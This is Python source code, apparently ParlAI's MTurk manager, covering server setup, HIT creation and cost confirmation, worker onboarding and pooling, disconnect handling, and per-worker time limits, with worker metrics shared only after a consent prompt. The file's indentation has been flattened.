os.path.join(PARLAI_CRED_DIR, 'mturk_log_permission.pickle')
TWO_WEEKS = 60 * 60 * 24 * 7 * 2
parent_dir = os.path.dirname(os.path.abspath(__file__))
class LockFile():
flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY
def __init__(self, filename):
self.filename = filename
self.fd = None
def __enter__(self):
while self.fd is None:
try:
self.fd = os.open(self.filename, self.flags)
except OSError as e:
if e.errno == errno.EEXIST: # Failed as the file exists.
pass
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
return self
def __exit__(self, *args):
os.close(self.fd)
os.remove(self.filename)
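# --- Hedged usage sketch (added for illustration; not part of the original file) ---
# LockFile is used further below to serialize access to the pickled
# working-time logs across processes. A minimal, self-contained version of the
# same pattern (the file names here are examples only):
def _example_locked_update(path='example_times.pickle', lock='example_times.lock'):
    with LockFile(lock):
        data = {}
        if os.path.exists(path):
            with open(path, 'rb') as time_file:
                data = pickle.load(time_file)
        data['last_touched'] = time.time()
        with open(path, 'wb') as time_file:
            pickle.dump(data, time_file, pickle.HIGHEST_PROTOCOL)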
class MTurkManager():
"""Manages interactions between MTurk agents as well as direct interactions
between a world and the MTurk server.
"""
STATE_CREATED = 0 # object created
STATE_SERVER_ALIVE = 1 # heroku server running
STATE_INIT_RUN = 2 # run initialized
STATE_ACCEPTING_WORKERS = 3 # Socket ready to receive workers
STATE_HITS_MADE = 4 # hits created
def __init__(self, opt, mturk_agent_ids, is_test=False, use_db=False):
"""Create an MTurkManager using the given setup opts and a list of
agent_ids that will participate in each conversation
"""
if not is_test:
try:
import parlai_internal.mturk.configs as local_configs
opt = local_configs.apply_default_opts(opt)
except Exception:
# not all users will be drawing configs from internal settings
pass
self.opt = opt
if self.opt['unique_worker'] or \
self.opt['unique_qual_name'] is not None:
self.opt['allowed_conversations'] = 1
self.server_url = None
self.topic_arn = None
self.server_task_name = None
self.port = 443
self.task_group_id = None
self.run_id = None
self.mturk_agent_ids = mturk_agent_ids
self.task_files_to_copy = None
self.is_sandbox = opt['is_sandbox']
self.agent_pool_change_condition = threading.Condition()
self.onboard_function = None
self.num_conversations = opt['num_conversations']
self.required_hits = math.ceil(
self.num_conversations * len(self.mturk_agent_ids) * HIT_MULT
)
self.minimum_messages = opt.get('min_messages', 0)
self.auto_approve_delay = \
opt.get('auto_approve_delay', 4 * 7 * 24 * 3600)
self.has_time_limit = opt.get('max_time', 0) > 0
self.socket_manager = None
self.worker_manager = WorkerManager(self, opt)
self.is_test = is_test
self.is_unique = False
self.max_hits_per_worker = opt.get('max_hits_per_worker', 0)
self._init_logging_config()
self.is_shutdown = False
self.use_db = use_db # TODO enable always once DB integration is complete
self.db_logger = None
self.logging_permitted = False
self.task_state = self.STATE_CREATED
# Helpers and internal manager methods #
def _init_state(self):
"""Initialize everything in the worker, task, and thread states"""
# TODO handle pooling in own class, note this is an agent_pool
self.agent_pool = []
# TODO move some state to DB
self.hit_id_list = [] # list of outstanding incomplete hits
self.assignment_to_onboard_thread = {}
self.conversation_index = 0
self.started_conversations = 0
self.completed_conversations = 0
self.task_threads = []
self.accepting_workers = True
self._reset_time_logs(init_load=True)
self.qualifications = None
self.unique_qual_name = None
self.time_limit_checked = time.time()
self.task_state = self.STATE_INIT_RUN
self.last_hit_check = time.time()
if self.use_db:
db_filename = 'pmt_sbdata.db' if self.is_sandbox else 'pmt_data.db'
self.db_logger = MTurkDataHandler(self.task_group_id, db_filename)
def _init_logging_config(self):
"""Initialize logging settings from the opt"""
shared_utils.set_is_debug(self.opt['is_debug'])
shared_utils.set_log_level(self.opt['log_level'])
def _logging_permission_check(self):
if self.is_test:
return False
if not os.path.exists(PARLAI_CRED_DIR):
os.makedirs(PARLAI_CRED_DIR)
if os.path.exists(PARLAI_MTURK_LOG_PERMISSION_FILE):
with open(PARLAI_MTURK_LOG_PERMISSION_FILE, 'rb') as perm_file:
permissions = pickle.load(perm_file)
if permissions['allowed'] is True:
return True
elif time.time() - permissions['asked_time'] < TWO_WEEKS:
return False
# Snooze expired
os.remove(PARLAI_MTURK_LOG_PERMISSION_FILE)
print(
'Would you like to help improve ParlAI-MTurk by providing some '
'metrics? We would like to record acceptance, completion, and '
'disconnect rates by worker. These metrics let us track the '
'health of the platform. If you accept we\'ll collect this data '
'on all of your future runs. We\'d ask before collecting anything '
'else, but currently we have no plans to. If you decline, this '
'request will be snoozed for 2 weeks.')
selected = ''
while selected not in ['y', 'Y', 'n', 'N']:
selected = input('Share worker rates? (y/n): ')
if selected not in ['y', 'Y', 'n', 'N']:
print('Must type one of (Y/y/N/n)')
if selected in ['y', 'Y']:
print('Thanks for helping us make the platform better!')
permissions = {
'allowed': selected in ['y', 'Y'],
'asked_time': time.time()
}
with open(PARLAI_MTURK_LOG_PERMISSION_FILE, 'wb+') as perm_file:
pickle.dump(permissions, perm_file)
return permissions['allowed']
def _upload_worker_data(self):
"""Uploads worker data acceptance and completion rates to the parlai
server
"""
worker_data = self.worker_manager.get_worker_data_package()
data = {'worker_data': worker_data}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
requests.post(PARLAI_MTURK_UPLOAD_URL, json=data, headers=headers)
def _maintain_hit_status(self):
def update_status():
while len(self.hit_id_list) > 0:
cur_time = time.time()
if cur_time - self.last_hit_check > 10:
self.last_hit_check = cur_time
for hit_id in self.hit_id_list.copy():
hit = self.get_hit(hit_id)
hit_data = hit['HIT']
if hit_data['HITStatus'] in \
['Reviewable', 'Reviewing', 'Disposed']:
self.hit_id_list.remove(hit_id)
time.sleep(10)
hit_status_thread = threading.Thread(target=update_status, daemon=True)
hit_status_thread.start()
def _reset_time_logs(self, init_load=False, force=False):
# Uses a weak lock file to try to prevent clobbering between threads
file_path = os.path.join(parent_dir, TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, TIME_LOGS_FILE_LOCK)
with LockFile(file_lock) as _lock_file:
assert _lock_file is not None
if os.path.exists(file_path):
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
# Initial loads should only reset if it's been a day,
# otherwise only need to check an hour for safety
compare_time = 24 * 60 * 60 if init_load else 60 * 60
if time.time() - existing_times['last_reset'] < \
compare_time and not force:
return # do nothing if it's been less than a day
reset_workers = list(existing_times.keys())
reset_workers.remove('last_reset')
if len(reset_workers) != 0:
self.worker_manager.un_time_block_workers(
reset_workers)
# Reset the time logs
os.remove(file_path)
# new time logs
with open(file_path, 'wb+') as time_log_file:
time_logs = {'last_reset': time.time()}
pickle.dump(time_logs, time_log_file,
pickle.HIGHEST_PROTOCOL)
def _log_working_time(self, mturk_agent):
additional_time = time.time() - mturk_agent.creation_time
worker_id = mturk_agent.worker_id
file_path = os.path.join(parent_dir, TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, TIME_LOGS_FILE_LOCK)
with LockFile(file_lock) as _lock_file:
assert _lock_file is not None
if not os.path.exists(file_path):
self._reset_time_logs()
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
total_work_time = existing_times.get(worker_id, 0)
total_work_time += additional_time
existing_times[worker_id] = total_work_time
os.remove(file_path)
with open(file_path, 'wb+') as time_log_file:
pickle.dump(existing_times, time_log_file,
pickle.HIGHEST_PROTOCOL)
if total_work_time > int(self.opt.get('max_time')):
self.worker_manager.time_block_worker(worker_id)
def _move_agents_to_waiting(self, agents):
"""Put all agents into waiting worlds, expire them if no longer
accepting agents. If the agent is already final, clean it
"""
for agent in agents:
worker_id = agent.worker_id
assignment_id = agent.assignment_id
if agent.is_final():
agent.reduce_state()
self.socket_manager.close_channel(agent.get_connection_id())
continue
conversation_id = 'w_{}'.format(uuid.uuid4())
if self.accepting_workers:
# Move the worker into a waiting world
self.worker_manager.change_agent_conversation(
agent=agent,
conversation_id=conversation_id,
new_agent_id='waiting',
)
else:
self.force_expire_hit(worker_id, assignment_id)
def _expire_onboarding_pool(self):
"""Expire any agent that is in an onboarding thread"""
def expire_func(agent):
self.force_expire_hit(agent.worker_id, agent.assignment_id)
def is_onboard(agent):
return agent.get_status() == AssignState.STATUS_ONBOARDING
self.worker_manager.map_over_agents(expire_func, is_onboard)
def _expire_agent_pool(self):
"""Expire all workers in the worker pool"""
for agent in self.agent_pool.copy():
self.force_expire_hit(agent.worker_id, agent.assignment_id)
with self.agent_pool_change_condition:
self._remove_from_agent_pool(agent)
def _get_unique_pool(self, eligibility_function):
"""Return a filtered version of the worker pool where each worker is
only listed a maximum of one time. In sandbox this is overridden for
testing purposes, and the same worker can be returned more than once
"""
pool = [a for a in self.agent_pool if not a.hit_is_returned]
if eligibility_function['multiple'] is True:
agents = eligibility_function['func'](pool)
else:
agents = [a for a in pool if eligibility_function['func'](a)]
unique_agents = []
unique_worker_ids = []
for agent in agents:
if (self.is_sandbox) or (agent.worker_id not in unique_worker_ids):
unique_agents.append(agent)
unique_worker_ids.append(agent.worker_id)
return unique_agents
def _add_agent_to_pool(self, agent):
"""Add a single agent to the pool"""
if agent not in self.agent_pool:
# Add the agent to pool
with self.agent_pool_change_condition:
if agent not in self.agent_pool:
shared_utils.print_and_log(
logging.DEBUG,
"Adding worker {} to pool.".format(agent.worker_id)
)
self.agent_pool.append(agent)
def _remove_from_agent_pool(self, agent):
"""Remove an agent from the pool. should be called under the
agent_pool_change_condition being set.
"""
assert agent in self.agent_pool, 'agent not in pool'
self.agent_pool.remove(agent)
def _handle_agent_disconnect(self, worker_id, assignment_id):
"""Mark a worker as disconnected and send a message to all agents in
their conversation that a partner has disconnected.
"""
self.worker_manager.handle_agent_disconnect(
worker_id, assignment_id, self._handle_partner_disconnect)
def _handle_partner_disconnect(self, agent):
"""Send a message to an agent notifying them that a partner has
disconnected and we marked the HIT as complete for them
"""
if agent is not None and not agent.is_final():
# Update the assignment state
agent.some_agent_disconnected = True
agent_messages = [m for m in agent.get_messages()
if 'id' in m and m['id'] == agent.id]
if len(agent_messages) < self.minimum_messages:
agent.set_status(AssignState.STATUS_PARTNER_DISCONNECT_EARLY)
else:
agent.set_status(AssignState.STATUS_PARTNER_DISCONNECT)
# Create and send the command
data = agent.get_inactive_command_data()
def disconnect_agent(*args):
self.socket_manager.close_channel(
agent.get_connection_id())
self.send_command(agent.worker_id, agent.assignment_id, data,
ack_func=disconnect_agent)
def _restore_agent_state(self, worker_id, assignment_id):
"""Send a command to restore the state of an agent who reconnected"""
agent = self.worker_manager._get_agent(worker_id, assignment_id)
if agent is not None:
agent.alived = False
def send_state_data():
while not agent.alived and not agent.hit_is_expired:
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
data = {
'text': data_model.COMMAND_RESTORE_STATE,
'messages': agent.get_messages(),
'last_command': agent.get_last_command(),
}
self.send_command(worker_id, assignment_id, data)
if agent.message_request_time is not None:
agent.request_message()
state_thread = threading.Thread(target=send_state_data)
state_thread.daemon = True
state_thread.start()
# Return an agent to their conversation, then restore the state
self.worker_manager.change_agent_conversation(
agent=agent,
conversation_id=agent.conversation_id,
new_agent_id=agent.id,
)
def _setup_socket(self, timeout_seconds=None):
"""Set up a socket_manager with defined callbacks"""
assert self.task_state >= self.STATE_INIT_RUN, \
'socket cannot be set up until run is started'
socket_server_url = self.server_url
if (self.opt['local']): # skip some hops for local stuff
socket_server_url = "https://localhost"
self.socket_manager = SocketManager(
socket_server_url,
self.port,
self._on_alive,
self._on_new_message,
self._on_socket_dead,
self.task_group_id,
socket_dead_timeout=timeout_seconds,
server_death_callback=self.shutdown,
)
def _on_alive(self, pkt):
"""Update MTurkManager's state when a worker sends an
alive packet. This asks the socket manager to open a new channel and
then handles ensuring the worker state is consistent
"""
shared_utils.print_and_log(
logging.DEBUG,
'on_agent_alive: {}'.format(pkt)
)
worker_id = pkt.data['worker_id']
hit_id = pkt.data['hit_id']
assign_id = pkt.data['assignment_id']
conversation_id = pkt.data['conversation_id']
if not assign_id:
# invalid assignment_id is an auto-fail
shared_utils.print_and_log(
logging.WARN,
'Agent ({}) with no assign_id called alive'.format(worker_id)
)
return
# Open a channel if it doesn't already exist
self.socket_manager.open_channel(worker_id, assign_id)
# Get a state for this worker, create if non existing
worker_state = self.worker_manager.worker_alive(worker_id)
if self.db_logger is not None:
self.db_logger.log_worker_note(
worker_id, assign_id,
'Reconnected with conversation_id {} at {}'.format(
conversation_id, time.time()))
if not worker_state.has_assignment(assign_id):
# New connection for the worker. First ensure that this connection
# isn't violating our uniqueness constraints
completed_assignments = worker_state.completed_assignments()
max_hits = self.max_hits_per_worker
if ((self.is_unique and completed_assignments > 0) or
(max_hits != 0 and completed_assignments > max_hits)):
text = (
'You have already participated in this HIT the maximum '
'number of times. This HIT is now expired. '
'Please return the HIT.'
)
self.force_expire_hit(worker_id, assign_id, text)
return
# Ensure we are still accepting workers
if not self.accepting_workers:
self.force_expire_hit(worker_id, assign_id)
return
# Ensure worker has not exceeded concurrent convo cap
convs = worker_state.active_conversation_count()
allowed_convs = self.opt['allowed_conversations']
if allowed_convs > 0 and convs >= allowed_convs:
text = ('You can participate in only {} of these HITs at '
'once. Please return this HIT and finish your '
'existing HITs before accepting more.'.format(
allowed_convs
))
self.force_expire_hit(worker_id, assign_id, text)
return
# Initialize a new agent for this worker
self.worker_manager.assign_task_to_worker(
hit_id, assign_id, worker_id
)
if self.db_logger is not None:
self.db_logger.log_worker_accept_assignment(
worker_id, assign_id, hit_id)
agent = self.worker_manager._get_agent(worker_id, assign_id)
self._onboard_new_agent(agent)
else:
# Reconnecting worker
agent = self.worker_manager._get_agent(worker_id, assign_id)
agent.log_reconnect()
agent.alived = True
if agent.get_status() == AssignState.STATUS_NONE:
# See if assigned an onboarding world, update state if so
if self.is_onboarding_world(conversation_id):
agent.set_status(AssignState.STATUS_ONBOARDING)
return
if self.is_waiting_world(conversation_id):
agent.set_status(AssignState.STATUS_WAITING)
self._add_agent_to_pool(agent)
return
# Reconnecting before even being given a world. Kill the hit
# so that on a reconnect they can get a new one assigned and
# the resources of the first one are cleaned.
self.force_expire_hit(worker_id, assign_id)
return
elif agent.get_status() == AssignState.STATUS_ONBOARDING:
# See if moved to a waiting world, update state if so
if self.is_waiting_world(conversation_id):
agent.set_status(AssignState.STATUS_WAITING)
self._add_agent_to_pool(agent)
return
# Reconnecting to the onboarding world should either restore
# state or expire (if workers are no longer being accepted
# for this task)
if not self.accepting_workers:
self.force_expire_hit(worker_id, assign_id)
elif not conversation_id:
self._restore_agent_state(worker_id, assign_id)
elif agent.get_status() == AssignState.STATUS_WAITING:
if self.is_task_world(conversation_id):
agent.set_status(AssignState.STATUS_IN_TASK)
agent.clear_messages()
return
# Reconnecting in waiting is either the first reconnect after
# being told to wait or a waiting reconnect. Restore state if
# no information is held, and add to the pool if not already in
# the pool
if not conversation_id:
self._restore_agent_state(worker_id, assign_id)
self._add_agent_to_pool(agent)
elif agent.get_status() == AssignState.STATUS_IN_TASK:
if self.is_waiting_world(conversation_id):
agent.set_status(AssignState.STATUS_WAITING)
self._add_agent_to_pool(agent)
return
# Reconnecting to the onboarding world or to a task world
# should resend the messages already in the conversation
if not conversation_id:
self._restore_agent_state(worker_id, assign_id)
elif (agent.get_status() == AssignState.STATUS_DISCONNECT or
agent.get_status() == AssignState.STATUS_DONE or
agent.get_status() == AssignState.STATUS_EXPIRED or
agent.get_status() == AssignState.STATUS_RETURNED or
agent.get_status() == AssignState.STATUS_PARTNER_DISCONNECT):
# inform the connecting user in all of these cases that the
# task is no longer workable, use appropriate message
data = agent.get_inactive_command_data()
def disconnect_agent(*args):
self.socket_manager.close_channel(
agent.get_connection_id())
self.send_command(worker_id, assign_id, data,
ack_func=disconnect_agent)
def _handle_mturk_message(self, pkt):
assignment_id = pkt.assignment_id
agent = self.worker_manager.get_agent_for_assignment(assignment_id)
if agent is None:
return
mturk_event_type = pkt.data['text']
if mturk_event_type == SNS_ASSIGN_RETURNED:
agent.hit_is_returned = True
# Treat as a socket_dead event
self._on_socket_dead(agent.worker_id, assignment_id)
elif mturk_event_type == SNS_ASSIGN_ABANDONDED:
agent.set_hit_is_abandoned()
# Treat as a socket_dead event
self._on_socket_dead(agent.worker_id, assignment_id)
elif mturk_event_type == SNS_ASSIGN_SUBMITTED:
# Socket dead already called, just mark as complete
agent.hit_is_complete = True
def _on_new_message(self, pkt):
"""Handle incoming messages from Amazon's SNS queue. All other packets
should be handled by the worker_manager
"""
if pkt.sender_id == AMAZON_SNS_NAME:
self._handle_mturk_message(pkt)
return
self.worker_manager.route_packet(pkt)
def _on_socket_dead(self, worker_id, assignment_id):
"""Handle a disconnect event, update state as required and notifying
other agents if the disconnected agent was in conversation with them
returns False if the socket death should be ignored and the socket
should stay open and not be considered disconnected
"""
agent = self.worker_manager._get_agent(worker_id, assignment_id)
if agent is None:
# This worker never registered, so we don't do anything
return
shared_utils.print_and_log(
logging.DEBUG,
'Worker {} disconnected from {} in status {}'.format(
worker_id,
agent.conversation_id,
agent.get_status()
)
)
if agent.get_status() == AssignState.STATUS_NONE:
# Agent never made it to onboarding, delete
agent.set_status(AssignState.STATUS_DISCONNECT)
agent.reduce_state()
elif agent.get_status() == AssignState.STATUS_ONBOARDING:
# Agent never made it to task pool, the onboarding thread will die
# and delete the agent if we mark it as a disconnect
agent.set_status(AssignState.STATUS_DISCONNECT)
agent.reduce_state()
agent.disconnected = True
elif agent.get_status() == AssignState.STATUS_WAITING:
# agent is in pool, remove from pool and delete
if agent in self.agent_pool:
with self.agent_pool_change_condition:
self._remove_from_agent_pool(agent)
agent.set_status(AssignState.STATUS_DISCONNECT)
agent.reduce_state()
agent.disconnected = True
elif agent.get_status() == AssignState.STATUS_IN_TASK:
self._handle_agent_disconnect(worker_id, assignment_id)
agent.disconnected = True
elif agent.get_status() == AssignState.STATUS_DONE:
# It's okay if a complete assignment socket dies, but wait for the
# world to clean up the resource
return
self.socket_manager.close_channel(agent.get_connection_id())
def _onboard_new_agent(self, mturk_agent):
"""Handle creating an onboarding thread and moving an agent through
the onboarding process, updating the state properly along the way
Returns True if a thread is launched, False if the call is ignored.
"""
# get state variable in question
worker_id = mturk_agent.worker_id
assignment_id = mturk_agent.assignment_id
def _onboard_function(mturk_agent):
"""Onboarding wrapper to set state to onboarding properly"""
if self.onboard_function:
conversation_id = 'o_' + str(uuid.uuid4())
self.worker_manager.change_agent_conversation(
agent=mturk_agent,
conversation_id=conversation_id,
new_agent_id='onboarding',
)
# Wait for turker to be in onboarding status
did_arrive = \
mturk_agent.wait_for_status(AssignState.STATUS_ONBOARDING)
if not did_arrive:
return
# call onboarding function
self.onboard_function(mturk_agent)
# once onboarding is done, move into a waiting world
self._move_agents_to_waiting([mturk_agent])
if assignment_id in self.assignment_to_onboard_thread:
if self.assignment_to_onboard_thread[assignment_id].is_alive():
return False
agent = self.worker_manager.get_agent_for_assignment(assignment_id)
# Only start an onboarding world if the worker never got a world
if agent.get_status() != AssignState.STATUS_NONE:
return False
# Start the onboarding thread and run it
onboard_thread = threading.Thread(
target=_onboard_function,
args=(mturk_agent,),
name='onboard-{}-{}'.format(worker_id, assignment_id)
)
onboard_thread.daemon = True
onboard_thread.start()
self.assignment_to_onboard_thread[assignment_id] = onboard_thread
return True
def _no_agents_incomplete(self, agents):
"""Return True if all the given agents completed their task"""
for agent in agents:
if not agent.is_final() or agent.get_status() != \
AssignState.STATUS_DONE:
return False
return True
def _check_time_limit(self):
if time.time() - self.time_limit_checked < RESET_TIME_LOG_TIMEOUT:
return
if int(time.time()) % (60 * 60 * 24) > (60 * 30):
# sync the time resets to ONCE DAILY in a 30 minute window
return
self.time_limit_checked = time.time()
self._reset_time_logs()
self.worker_manager.un_time_block_workers()
def is_onboarding_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('o_')
def is_waiting_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('w_')
def is_task_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('t_')
# Manager Lifecycle Functions #
def setup_server(self, task_directory_path=None):
"""Prepare the MTurk server for the new HIT we would like to submit"""
assert self.task_state >= self.STATE_CREATED
fin_word = 'start'
if self.opt['count_complete']:
fin_word = 'finish'
shared_utils.print_and_log(
logging.INFO,
'\nYou are going to allow workers from Amazon Mechanical Turk to '
'be an agent in ParlAI.\nDuring this process, Internet connection '
'is required, and you should turn off your computer\'s auto-sleep '
'feature.',
should_print=True,
)
if self.opt['max_connections'] == 0:
shared_utils.print_and_log(
logging.INFO,
'Enough HITs will be created to fulfill {} times the '
'number of conversations requested, extra HITs will be expired'
' once the desired conversations {}.'
''.format(HIT_MULT, fin_word),
should_print=True,
)
else:
shared_utils.print_and_log(
logging.INFO,
'Enough HITs will be launched over time '
'up to a max of {} times the amount requested until the '
'desired number of conversations {}.'
''.format(HIT_MULT, fin_word),
should_print=True,
)
input('Please press Enter to continue... ')
shared_utils.print_and_log(logging.NOTSET, '', True)
if self.opt['local'] is True:
shared_utils.print_and_log(
logging.INFO,
"In order to run the server locally, you will need "
"to have a public HTTPS endpoint (SSL signed) running on "
"the server you are currently excecuting ParlAI on. Enter "
"that public URL hostname when prompted and ensure that the "
"port being used by ParlAI (usually 3000) has external "
"traffic routed to it.",
should_print=True,
)
input('Please press Enter to continue... ')
mturk_utils.setup_aws_credentials()
# See if there's enough money in the account to fund the HITs requested
num_assignments = self.required_hits
payment_opt = {
'type': 'reward',
'num_total_assignments': num_assignments,
'reward': self.opt['reward'], # in dollars
}
total_cost = mturk_utils.calculate_mturk_cost(payment_opt=payment_opt)
if not mturk_utils.check_mturk_balance(
balance_needed=total_cost,
is_sandbox=self.opt['is_sandbox']):
raise SystemExit('Insufficient funds')
if ((not self.opt['is_sandbox']) and
(total_cost > 100 or self.opt['reward'] > 1)):
confirm_string = '$%.2f' % total_cost
expected_cost = total_cost / HIT_MULT
expected_string = '$%.2f' % expected_cost
shared_utils.print_and_log(
logging.INFO,
'You are going to create {} HITs at {} per assignment, for a '
'total cost up to {} after MTurk fees. Please enter "{}" to '
'confirm and continue, and anything else to cancel.\nNote that'
' of the {}, the target amount to spend is {}.'.format(
self.required_hits,
'$%.2f' % self.opt['reward'],
confirm_string,
confirm_string,
confirm_string,
expected_string
),
should_print=True
)
check = input('Enter here: ')
if (check != confirm_string and ('$' + check) != confirm_string):
raise SystemExit('Cancelling')
# Check to see if there are any additional notices on the parlai site
if not self.is_test:
shared_utils.print_and_log(
logging.INFO,
'Querying the parlai website for possible notices...',
should_print=True)
endpoint = 'sandbox' if self.is_sandbox else 'live'
resp = requests.post(PARLAI_MTURK_NOTICE_URL + endpoint)
warnings = resp.json()
for warn in warnings:
print('Notice: ' + warn)
accept = input('Continue? (Y/n): ')
if accept == 'n':
raise SystemExit('Additional notice was rejected.')
self.logging_permitted = self._logging_permission_check()
shared_utils.print_and_log(logging.INFO, 'Setting up MTurk server...',
should_print=True)
self.is_unique = self.opt['unique_worker'] or \
(self.opt['unique_qual_name'] is not None)
self.max_hits_per_worker = self.opt.get('max_hits_per_worker', 0)
mturk_utils.create_hit_config(
task_description=self.opt['task_description'],
unique_worker=self.is_unique,
is_sandbox=self.opt['is_sandbox']
)
# Populate files to copy over to the server
if not self.task_files_to_copy:
self.task_files_to_copy = []
if not task_directory_path:
task_directory_path = os.path.join(
self.opt['parlai_home'],
'parlai',
'mturk',
'tasks',
self.opt['task']
)
self.task_files_to_copy.append(
os.path.join(task_directory_path, 'html', 'cover_page.html'))
try:
for file_name in os.listdir(os.path.join(
task_directory_path, 'html')):
self.task_files_to_copy.append(os.path.join(
task_directory_path, 'html', file_name
))
except FileNotFoundError: # noqa F821 we don't support python2
# No html dir exists
pass
for mturk_agent_id in self.mturk_agent_ids + ['onboarding']:
self.task_files_to_copy.append(os.path.join(
task_directory_path,
'html',
'{}_index.html'.format(mturk_agent_id)
))
# Setup the server with a likely-unique app-name
task_name = '{}-{}'.format(str(uuid.uuid4())[:8], self.opt['task'])
self.server_task_name = \
''.join(e for e in task_name.lower() if e.isalnum() or e == '-')
if 'heroku_team' in self.opt:
heroku_team = self.opt['heroku_team']
else:
heroku_team = None
self.server_url = server_utils.setup_server(self.server_task_name,
self.task_files_to_copy,
self.opt['local'],
heroku_team)
shared_utils.print_and_log(logging.INFO, self.server_url)
shared_utils.print_and_log(logging.INFO, "MTurk server setup done.\n",
should_print=True)
self.task_state = self.STATE_SERVER_ALIVE
def start_new_run(self):
"""Clear state to prepare for a new run"""
assert self.task_state >= self.STATE_SERVER_ALIVE, \
'Cannot start a run before having a running server using ' \
'`mturk_manager.setup_server()` first.'
self.run_id = str(int(time.time()))
self.task_group_id = '{}_{}'.format(self.opt['task'], self.run_id)
self._init_state()
try:
self.topic_arn = mturk_utils.setup_sns_topic(
self.opt['task'],
self.server_url,
self.task_group_id
)
except Exception:
self.topic_arn = None
shared_utils.print_and_log(
logging.WARN,
'Botocore couldn\'t subscribe to HIT events, '
'perhaps you tried to register to localhost?',
should_print=True
)
if self.db_logger is not None:
self.db_logger.log_new_run(self.required_hits)
self.task_state = self.STATE_INIT_RUN
def ready_to_accept_workers(self, timeout_seconds=None):
"""Set up socket to start communicating to workers"""
assert self.task_state >= self.STATE_INIT_RUN, \
'Cannot be ready to accept workers before starting a run with ' \
'`mturk_manager.start_new_run()` first.'
shared_utils.print_and_log(logging.INFO,
'Local: Setting up WebSocket...',
not self.is_test)
self._setup_socket(timeout_seconds=timeout_seconds)
shared_utils.print_and_log(logging.INFO, 'WebSocket set up!',
should_print=True)
# Just in case create_hits was called first. To be removed when that
# workflow is no longer supported
if self.STATE_ACCEPTING_WORKERS > self.task_state:
self.task_state = self.STATE_ACCEPTING_WORKERS
def set_onboard_function(self, onboard_function):
self.onboard_function = onboard_function
def start_task(self, eligibility_function, assign_role_function,
task_function):
"""Handle running a task by checking to see when enough agents are
in the pool to start an instance of the task. Continue doing this
until the desired number of conversations is had.
"""
assert self.task_state >= self.STATE_HITS_MADE, \
'Must have launched HITs with `mturk_manager.create_hits`' \
' to start the task'
if callable(eligibility_function):
# Convert legacy eligibility_functions to the new format
eligibility_function = {
'multiple': False,
'func': eligibility_function,
}
else:
# Ensure the eligibility function is valid
if 'func' not in eligibility_function:
shared_utils.print_and_log(
logging.CRITICAL,
"eligibility_function has no 'func'. Cancelling."
)
raise Exception(
'eligibility_function dict must contain a `func` field '
'containing the actual function.'
)
elif not callable(eligibility_function['func']):
shared_utils.print_and_log(
logging.CRITICAL,
"eligibility_function['func'] not a function. Cancelling."
)
raise Exception(
"eligibility_function['func'] must contain a function. "
"If eligibility_function['multiple'] is set, it should "
"filter through the list of workers and only return those "
"that are currently eligible to participate. If it is not "
"set, it should take in a single worker and return whether"
" or not they are eligible."
)
if 'multiple' not in eligibility_function:
eligibility_function['multiple'] = False
def _task_function(opt, agents, conversation_id):
"""Wait for agents to join the world, then run task function"""
shared_utils.print_and_log(
logging.INFO,
'Starting task {}...'.format(conversation_id)
)
shared_utils.print_and_log(
logging.DEBUG,
'Waiting for all agents to join the conversation...'
)
start_time = time.time()
while True:
all_joined = True
for agent in agents:
# check the status of an individual agent assignment
if agent.get_status() != AssignState.STATUS_IN_TASK:
all_joined = False
if all_joined:
break
if time.time() - start_time > WORLD_START_TIMEOUT:
# We waited but not all agents rejoined, throw agents
# back into the waiting pool. Stragglers will disconnect
# from there
shared_utils.print_and_log(
logging.INFO,
'Timeout waiting for {}, move back to waiting'.format(
conversation_id
)
)
self._move_agents_to_waiting(agents)
return
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
shared_utils.print_and_log(
logging.INFO,
'All agents joined the conversation {}!'.format(
conversation_id
)
)
self.started_conversations += 1
task_function(mturk_manager=self, opt=opt, workers=agents)
# Delete extra state data that is now unneeded
for agent in agents:
agent.clear_messages()
# Count if it's a completed conversation
if self._no_agents_incomplete(agents):
self.completed_conversations += 1
if self.opt['max_connections'] > 0: # If using a conv cap
if self.accepting_workers: # if still looking for new agents
for agent in agents:
if agent.submitted_hit():
self.create_additional_hits(1)
while not self.is_shutdown:
if self.has_time_limit:
self._check_time_limit()
if self.db_logger is not None:
self._maintain_hit_status()
# Loop forever starting task worlds until desired convos are had
with self.agent_pool_change_condition:
valid_agents = self._get_unique_pool(eligibility_function)
needed_agents = len(self.mturk_agent_ids)
if len(valid_agents) >= needed_agents:
# enough agents in pool to start new conversation
self.conversation_index += 1
new_conversation_id = \
't_{}'.format(self.conversation_index)
# Add the required number of valid agents to the conv
agents = [a for a in valid_agents[:needed_agents]]
assign_role_function(agents)
# Allow task creator to filter out agents and run
# versions of the task that require fewer agents
agents = [a for a in agents if a.id is not None]
for agent in agents:
self.worker_manager.change_agent_conversation(
agent=agent,
conversation_id=new_conversation_id,
new_agent_id=agent.id,
)
# Remove selected agents from the pool
self._remove_from_agent_pool(agent)
# Start a new thread for this task world
task_thread = threading.Thread(
target=_task_function,
args=(self.opt, agents, new_conversation_id),
name='task-{}'.format(new_conversation_id)
)
task_thread.daemon = True
task_thread.start()
self.task_threads.append(task_thread)
# Once we've had enough conversations, finish and break
compare_count = self.started_conversations
if (self.opt['count_complete']):
compare_count = self.completed_conversations
if compare_count >= self.num_conversations:
self.accepting_workers = False
self.expire_all_unassigned_hits()
self._expire_onboarding_pool()
self._expire_agent_pool()
# Wait for all conversations to finish, then break from
# the while loop
for thread in self.task_threads:
thread.join()
break
time.sleep(shared_utils.THREAD_MEDIUM_SLEEP)
def _wait_for_task_expirations(self):
"""Wait for the full task duration to ensure anyone who sees the task
has it expired, and ensures that all tasks are properly expired
"""
start_time = time.time()
min_wait = self.opt['assignment_duration_in_seconds']
while time.time() - start_time < min_wait and \
len(self.hit_id_list) > 0:
self.expire_all_unassigned_hits()
time.sleep(
max(self.opt['assignment_duration_in_seconds'] / 60, 0.1)
)
def shutdown(self, force=False):
"""Handle any mturk client shutdown cleanup."""
